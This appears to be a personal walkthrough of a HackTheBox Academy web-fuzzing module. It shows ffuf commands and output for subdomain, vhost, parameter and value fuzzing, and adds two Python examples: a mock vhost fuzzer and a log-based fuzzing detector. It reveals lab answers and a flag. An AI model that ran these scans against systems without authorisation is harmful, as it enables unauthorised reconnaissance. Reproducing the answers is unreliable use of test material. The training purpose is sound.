Sub-domain Fuzzing
target: HackTheBox has an online Swag Store. Try running a sub-domain fuzzing test on "hackthebox.eu" to find it. What is its full domain?
Run it on Kali:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.hackthebox.eu/
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : https://FUZZ.hackthebox.eu/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
www [Status: 301, Size: 0, Words: 1, Lines: 1]
forum [Status: 301, Size: 0, Words: 1, Lines: 1]
dev [Status: 302, Size: 0, Words: 1, Lines: 1]
store [Status: 301, Size: 0, Words: 1, Lines: 1]
forums [Status: 301, Size: 0, Words: 1, Lines: 1]
app [Status: 301, Size: 0, Words: 1, Lines: 1]
help [Status: 301, Size: 0, Words: 1, Lines: 1]
dev2 [Status: 302, Size: 0, Words: 1, Lines: 1]
billing [Status: 302, Size: 101, Words: 5, Lines: 1]
The answer has to be this store entry: https://store.hackthebox.eu
Vhost Fuzzing
We are able to fuzz public sub-domains using public DNS records. However, when it comes to fuzzing sub-domains that do not have public DNS records, or sub-domains under a website that is not public, we cannot use the same method. In this section we will learn how to do that with VHost Fuzzing.
Vhosts vs. Sub-domains
The key difference between VHosts and sub-domains is that a VHost is basically a "sub-domain" served on the same server and with the same IP, so that a single IP can serve two or more different websites.
VHosts may or may not have public DNS records.
In many cases, websites have non-public sub-domains that are not published in public DNS records, so if we visit them in a browser we cannot connect, because public DNS does not know their IP. Again, with sub-domain fuzzing we can only identify the public sub-domains, never the non-public ones.
This is where VHost fuzzing against an existing IP comes in. We run the scan against that same IP, and we can then identify both public and non-public sub-domains and VHosts.
To scan for VHosts without manually adding the whole wordlist to /etc/hosts, we fuzz the HTTP headers, specifically the Host: header. To do so we can use the -H flag to specify a header and use the FUZZ keyword inside it, as follows:
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb'
Filtering Results
ffuf -h
...SNIP...
MATCHER OPTIONS:
-mc Match HTTP status codes, or "all" for everything. (default: 200,204,301,302,307,401,403)
-ml Match amount of lines in response
-mr Match regexp
-ms Match HTTP response size
-mw Match amount of words in response
FILTER OPTIONS:
-fc Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl Filter by amount of lines in response. Comma separated list of line counts and ranges
-fr Filter regexp
-fs Filter HTTP response size. Comma separated list of sizes and ranges
-fw Filter by amount of words in response. Comma separated list of word counts and ranges
From the test above we know that the response size of the wrong results is 900, so we can filter it out with -fs 900.
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs 900
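Why a size filter works at all (-fs 900 here, 986 and 985 on the lab instances further down), and how to derive that value automatically rather than reading it off a first noisy run, as an added example that is not part of the HTB module or of ffuf: a mock server on 127.0.0.1 hosts two constructed name-based vhosts (admin and test) and answers every other Host header with a 986-byte default page, and a minimal Host-header fuzzer calibrates its baseline from a random label that cannot exist, which is what ffuf's -ac option does in place of a hardcoded -fs.

```python
import secrets
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed vhost table: two real vhosts on one IP; any other Host header falls
# through to the default site, like the 986-byte default page in the lab scan.
VHOSTS = {"admin.academy.htb": b"<h1>Admin</h1>", "test.academy.htb": b"<h1>Test</h1>"}
DEFAULT_PAGE = b"<html>" + b"x" * 973 + b"</html>"  # exactly 986 bytes

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0]  # drop the port
        body = VHOSTS.get(host, DEFAULT_PAGE)
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the mock server quiet
        pass

def start_server():
    srv = HTTPServer(("127.0.0.1", 0), Handler)  # port 0: pick a free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv

# Bypass any http_proxy in the environment so requests really reach the mock.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))

def fetch_size(url, host):
    req = urllib.request.Request(url, headers={"Host": host})
    with OPENER.open(req, timeout=5) as resp:
        return len(resp.read())

def vhost_fuzz(url, domain, words):
    # Auto-calibration: a random label that cannot exist returns the default
    # site, so its size is the value that "-fs 986" hardcodes in the write-up.
    baseline = fetch_size(url, f"{secrets.token_hex(8)}.{domain}")
    hits = [(w, s) for w in words if (s := fetch_size(url, f"{w}.{domain}")) != baseline]
    return baseline, hits

if __name__ == "__main__":
    srv = start_server()
    url = f"http://127.0.0.1:{srv.server_port}/"
    print(vhost_fuzz(url, "academy.htb", ["www", "admin", "mail", "test", "dev"]))
    srv.shutdown()
```

A real default site changes size between instances (900, 985, 986 on this page), which is exactly why the baseline has to be measured per target and not copied from a previous run.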
practice
target:165.232.46.252:32335
Try running a VHost fuzzing scan on "academy.htb" and see what other VHosts you can get. What other VHosts did you get?
hint: make sure to filter correctly! Write the answer as "*.academy.htb".
kali:
First add the domain mapping to the hosts file (the IP only, no scheme):
echo "165.232.46.252 academy.htb" >> /etc/hosts
Scan: there are a lot of results, so filter them; here the vast majority of responses have size 986, so filter that out.
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:32335 -H 'Host: FUZZ.academy.htb' -fs 986
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://academy.htb:32335
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.academy.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 986
________________________________________________
admin [Status: 200, Size: 0, Words: 1, Lines: 1]
test [Status: 200, Size: 0, Words: 1, Lines: 1]
:: Progress: [4989/4989] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:44] :: Errors: 0 ::
This time there are only two results; tried each one, both give Secure Connection Failed.
Annoying, had to just submit both; the answer is test, annoying...
Parameter Fuzzing
GET Request Fuzzing
Similarly to how we fuzzed the various parts of a website, we will use ffuf to enumerate parameters. Let us first start with fuzzing GET requests, which are usually passed right after the URL with a ? symbol, for example:
http://admin.academy.htb:PORT/admin/admin.php?param1=key.
So all we have to do is replace param1 in the example above with FUZZ and rerun our scan. Before we can start, however, we must pick an appropriate wordlist. Once again, SecLists has one in /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt. With that, we can run our scan.
practice
target:139.59.185.174:32533
Using what you learned in this section, run a parameter fuzzing scan on this page. What is the parameter accepted by this web page?
kali:
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:32533/admin/admin.php?FUZZ=key -fs 798
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://admin.academy.htb:32533/admin/admin.php?FUZZ=key
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 798
________________________________________________
user [Status: 200, Size: 783, Words: 221, Lines: 54]
:: Progress: [6453/6453] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:56] :: Errors: 0 ::
user.
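From the defender's side, the GET scan above leaves a distinctive trace in an ordinary combined-format access log: one client, one path, thousands of distinct query-parameter names, and one response size for everything except the live parameter. The following detector is added here (not from the module or from any tool); it parses constructed log lines modelled on that scan and reports the client, the baseline size the scanner would have had to filter with -fs, and the parameters whose responses differed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# Combined log format: client ident user [time] "request line" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["params"] = tuple(k for k, _ in parse_qsl(url.query, keep_blank_values=True))
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec

def detect_param_fuzzing(lines, min_distinct=10):
    # Group GET requests by (client, path). Many distinct parameter names against
    # one path means a list like burp-parameter-names.txt; the most common size is
    # the "nothing happened" baseline, and requests that differ name live params.
    reqs = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "GET" and rec["params"]:
            reqs[(rec["ip"], rec["path"])].append((rec["params"], rec["size"]))
    alerts = []
    for (ip, path), items in reqs.items():
        distinct = {p for params, _ in items for p in params}
        if len(distinct) < min_distinct:
            continue
        baseline = Counter(size for _, size in items).most_common(1)[0][0]
        live = sorted({p for params, size in items if size != baseline for p in params})
        alerts.append({"client": ip, "path": path, "distinct_params": len(distinct),
                       "baseline_size": baseline, "live_params": live})
    return alerts

def sample_log():
    # Constructed lines modelled on the GET scan above: twelve wordlist names from
    # 10.10.14.5, all 798 bytes except "user" (783), plus one ordinary visitor.
    names = "id page q search lang file name action view token key user".split()
    fuzz = [f'10.10.14.5 - - [14/Jun/2023:11:00:{i:02d} +0000] "GET /admin/admin.php?{n}=key '
            f'HTTP/1.1" 200 {783 if n == "user" else 798} "-" "Fuzz Faster U Fool v1.3.1"'
            for i, n in enumerate(names)]
    normal = ['192.0.2.10 - - [14/Jun/2023:11:00:30 +0000] "GET /index.php?page=home '
              'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"']
    return fuzz + normal
```

The User-Agent in the constructed lines is assumed to be ffuf's default; the detector deliberately ignores it, since a scanner can set any value with -H, and keys on request volume and response sizes instead.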
POST Request Fuzzing
To fuzz the data field with ffuf we can use the -d flag, as we saw earlier in the output of ffuf -h. We also have to add -X POST to send POST requests.
Tip: In PHP, "POST" data "content-type" can only accept "application/x-www-form-urlencoded". So we can set that in "ffuf" with "-H 'Content-Type: application/x-www-form-urlencoded'".
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
v1.1.0-git
________________________________________________
:: Method : POST
:: URL : http://admin.academy.htb:PORT/admin/admin.php
:: Wordlist : FUZZ: /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : FUZZ=key
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
:: Filter : Response size: xxx
________________________________________________
id [Status: xxx, Size: xxx, Words: xxx, Lines: xxx]
<...SNIP...>
Let us see what we get if we send a POST request with the id parameter.
curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'
<div class='center'><p>Invalid id!</p></div>
Value Fuzzing
Here you need to judge for yourself and build your own brute-force list (e.g. ids.txt).
usage:
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
practice
target:139.59.185.174:32533
Try to create the "ids.txt" wordlist, identify the accepted value with a fuzzing scan, and then use it in a "POST" request with "curl" to collect the flag. What is the content of the flag?
kali:
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:32533/admin/admin.php -X POST -d 'id=FUZZ' -H "Content-Type: application/x-www-form-urlencoded" -fs 768
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : POST
:: URL : http://admin.academy.htb:32533/admin/admin.php
:: Wordlist : FUZZ: ids.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : id=FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 768
________________________________________________
73 [Status: 200, Size: 787, Words: 218, Lines: 54]
:: Progress: [1000/1000] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
Got 73, try it:
curl http://admin.academy.htb:32533/admin/admin.php -X POST -d 'id=73' -H "Content-Type: application/x-www-form-urlencoded" -i
HTTP/1.1 200 OK
Date: Wed, 14 Jun 2023 11:00:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 787
Content-Type: text/html; charset=UTF-8
<div class='center'><p>HTB{p4r4m373r_fuzz1n6_15_k3y!}</p></div>
ok.
Skills Assessment - Web Fuzzing
target:165.232.33.45:32589
- Run a sub-domain/vhost fuzzing scan on "*.academy.htb" for the IP shown above. What are the sub-domains you can identify? (Only write the sub-domain names)
- Before running a page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains?
- One of the pages you identify should say "You don't have access!". What is the full page URL?
- In the page from the previous question, you should be able to find multiple parameters that the page accepts. What are they?
- Try fuzzing the parameters you identified for working values. One of them should return a flag. What is the content of the flag?
kali:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://165.232.33.45:32589/ -H 'Host: FUZZ.academy.htb' -fs 985
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://165.232.33.45:32589/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.academy.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 985
________________________________________________
archive [Status: 200, Size: 0, Words: 1, Lines: 1]
test [Status: 200, Size: 0, Words: 1, Lines: 1]
faculty [Status: 200, Size: 0, Words: 1, Lines: 1]
:: Progress: [4989/4989] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:44] :: Errors: 0 ::
ok, on to the second question: scan all three sub-domains together; in the end faculty turned up one extra extension, php7:
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://faculty.academy.htb:32589/indexFUZZ
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://faculty.academy.htb:32589/indexFUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/web-extensions.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.php [Status: 200, Size: 0, Words: 1, Lines: 1]
.phps [Status: 403, Size: 287, Words: 20, Lines: 10]
.php7 [Status: 200, Size: 0, Words: 1, Lines: 1]
:: Progress: [40/40] :: Job [1/1] :: 35 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
Submitted the three answers; on to the third question. Intuitively faculty and php7 are still the prime suspects, since in the earlier scans only their results looked different. Scanned several sub-domains back and forth until my head hurt and still found nothing; probably I stopped too early, so I turned on recursion and let it scan by itself while I watched a match~
Sure enough, it turned up on faculty with php7. About 170k records in total; it was only found in the second round after 50k-odd more, i.e. 220k-odd requests, a bit under twenty minutes. Ugh, a practice lab does not need to be this much torture... Looking back at the log, though, it did prompt to scan the courses directory as soon as it found it; I was watching the match, but switching the target early would have been a lot faster.
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:32589/FUZZ -e .php7 -recursion -recursion-depth 1 -v -fs 287 -t 80
...
[Status: 200, Size: 774, Words: 223, Lines: 53]
| URL | http://faculty.academy.htb:32589/courses/linux-security.php7
* FUZZ: linux-security.php7
...
Question 4:
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:32589/courses/linux-security.php7?FUZZ=key -fs 774 -t 80
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://faculty.academy.htb:32589/courses/linux-security.php7?FUZZ=key
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 80
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 774
________________________________________________
user [Status: 200, Size: 780, Words: 223, Lines: 53]
:: Progress: [6453/6453] :: Job [1/1] :: 229 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
With the GET method we get user. Now POST: the first pass found nothing; for PHP you need to add the header 'Content-Type: application/x-www-form-urlencoded'.
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:32589/courses/linux-security.php7 -X POST -d "FUZZ=key" -fs 774 -t 80 -H 'Content-Type: application/x-www-form-urlencoded'
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : POST
:: URL : http://faculty.academy.htb:32589/courses/linux-security.php7
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : FUZZ=key
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 80
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 774
________________________________________________
user [Status: 200, Size: 780, Words: 223, Lines: 53]
username [Status: 200, Size: 781, Words: 223, Lines: 53]
:: Progress: [6453/6453] :: Job [1/1] :: 237 req/sec :: Duration: [0:00:35] :: Errors: 0 ::
One extra parameter, username. From experience with these questions, the next answer should start from this extra username, and SecLists happens to have a Usernames file, so try it: it finds harry, and sending that via POST returns the flag.